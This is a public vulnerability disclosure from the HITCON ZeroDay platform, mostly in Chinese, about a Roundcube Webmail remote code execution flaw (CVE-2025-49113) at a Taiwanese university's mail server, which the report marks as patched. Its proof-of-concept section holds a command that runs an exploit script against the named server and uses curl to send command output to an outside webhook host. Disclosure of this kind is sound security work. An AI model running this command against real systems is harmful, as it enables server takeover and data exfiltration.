Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-00588
- Vendor: 國立高雄師範大學
- Title: 國立高雄師範大學 Roundcube Webmail 遠端程式碼執行漏洞
- Introduction: PHP 物件反序列化導致遠端程式碼執行(CVE-2025-49113)
處理狀態
目前狀態
公開
Last Update : 2025/07/11
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2025/06/18 06:44:29 : 新提交 (由 鄉民 更新此狀態)
- 2025/06/21 16:52:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/24 16:30:05 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/24 16:30:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/06/24 16:30:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/07/03 08:04:30 : 已修補 (由 組織帳號 更新此狀態)
- 2025/07/11 03:00:45 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-00588
- 通報者:鄉民
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://std.nknu.edu.tw/mail/
140.127.62.8
140.127.62.8
敘述
前置條件
擁有郵件帳號密碼
概念性驗證 (Proof of Concept)
這邊測試對外發送 post request 從 response body 取得whoami命令執行結果
cmd='$(whoami)'
php mailpoc.php https://std.nknu.edu.tw/mail MAIL_USERNAME MAIL_PASSWORD "curl -X POST -d $cmd https://webhook.site/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
修補建議
更新Roundcube Webmail 至 1.5.10 或 1.6.11 版本
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。